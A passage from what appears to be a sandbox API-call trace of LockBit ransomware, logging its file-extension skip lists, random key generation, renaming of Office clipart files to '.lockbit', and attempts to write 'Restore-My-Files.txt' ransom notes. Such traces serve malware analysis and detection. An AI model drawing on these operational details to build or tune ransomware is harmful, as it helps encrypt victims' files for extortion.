(lpString1="thumbs.db", lpString2="PE05869_.WMF") returned 1 [0167.919] lstrcmpiW (lpString1="iconcache.db", lpString2="PE05869_.WMF") returned -1 [0167.919] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.919] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF") returned=".WMF" [0167.919] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.919] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.919] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.920] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.920] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF.lockbit") returned 72 [0167.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05869_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.927] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.927] malloc (_Size=0x40068) returned 0x3df0008 [0167.927] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1544) returned 1 [0167.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.928] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.931] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.931] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.932] free (_Block=0x1fa2ed8) [0167.932] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.932] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.932] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44428700, ftCreationTime.dwHighDateTime=0x1bd4c05, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x44428700, ftLastWriteTime.dwHighDateTime=0x1bd4c05, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE05870_.WMF", cAlternateFileName="")) returned 1 [0167.932] lstrcmpiW (lpString1=".", lpString2="PE05870_.WMF") returned -1 [0167.932] lstrcmpiW (lpString1="..", lpString2="PE05870_.WMF") returned -1 [0167.932] PathFindExtensionW (pszPath="PE05870_.WMF") returned=".WMF" [0167.932] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.932] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.933] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.933] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE05870_.WMF") returned 1 [0167.934] lstrcmpiW (lpString1="ntldr", lpString2="PE05870_.WMF") returned -1 [0167.934] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE05870_.WMF") returned -1 [0167.934] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE05870_.WMF") returned -1 [0167.934] lstrcmpiW (lpString1="autorun.inf", lpString2="PE05870_.WMF") returned -1 [0167.934] lstrcmpiW (lpString1="thumbs.db", lpString2="PE05870_.WMF") returned 1 [0167.934] lstrcmpiW (lpString1="iconcache.db", lpString2="PE05870_.WMF") returned -1 [0167.934] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.934] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF") returned=".WMF" [0167.934] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.934] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.934] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.935] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.935] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF.lockbit") returned 72 [0167.935] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05870_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.938] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.938] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.938] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1588) returned 1 [0167.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.939] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.941] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.941] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.942] free (_Block=0x1fa2ed8) [0167.942] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.942] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.942] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671b6e00, ftCreationTime.dwHighDateTime=0x1bd4bfa, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x671b6e00, ftLastWriteTime.dwHighDateTime=0x1bd4bfa, nFileSizeHigh=0x0, nFileSizeLow=0x7fce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE05930_.WMF", cAlternateFileName="")) returned 1 [0167.942] lstrcmpiW (lpString1=".", lpString2="PE05930_.WMF") returned -1 [0167.942] lstrcmpiW (lpString1="..", lpString2="PE05930_.WMF") returned -1 [0167.943] PathFindExtensionW (pszPath="PE05930_.WMF") returned=".WMF" [0167.943] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.943] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.944] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.944] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE05930_.WMF") returned 1 [0167.945] lstrcmpiW (lpString1="ntldr", lpString2="PE05930_.WMF") returned -1 [0167.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE05930_.WMF") returned -1 [0167.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE05930_.WMF") returned -1 [0167.945] lstrcmpiW (lpString1="autorun.inf", lpString2="PE05930_.WMF") returned -1 [0167.945] lstrcmpiW (lpString1="thumbs.db", lpString2="PE05930_.WMF") returned 1 [0167.945] lstrcmpiW (lpString1="iconcache.db", lpString2="PE05930_.WMF") returned -1 [0167.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF") returned=".WMF" [0167.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.945] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.945] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.946] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.946] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF.lockbit") returned 72 [0167.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05930_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.947] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.947] malloc (_Size=0x40068) returned 0x3d70450 [0167.947] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=32718) returned 1 [0167.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.948] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.952] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.952] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.952] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.953] free (_Block=0x1fa2ed8) [0167.953] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.953] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.954] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf03a600, ftCreationTime.dwHighDateTime=0x1bd4bf5, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbf03a600, ftLastWriteTime.dwHighDateTime=0x1bd4bf5, nFileSizeHigh=0x0, nFileSizeLow=0x121c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE06049_.WMF", cAlternateFileName="")) returned 1 [0167.954] lstrcmpiW (lpString1=".", 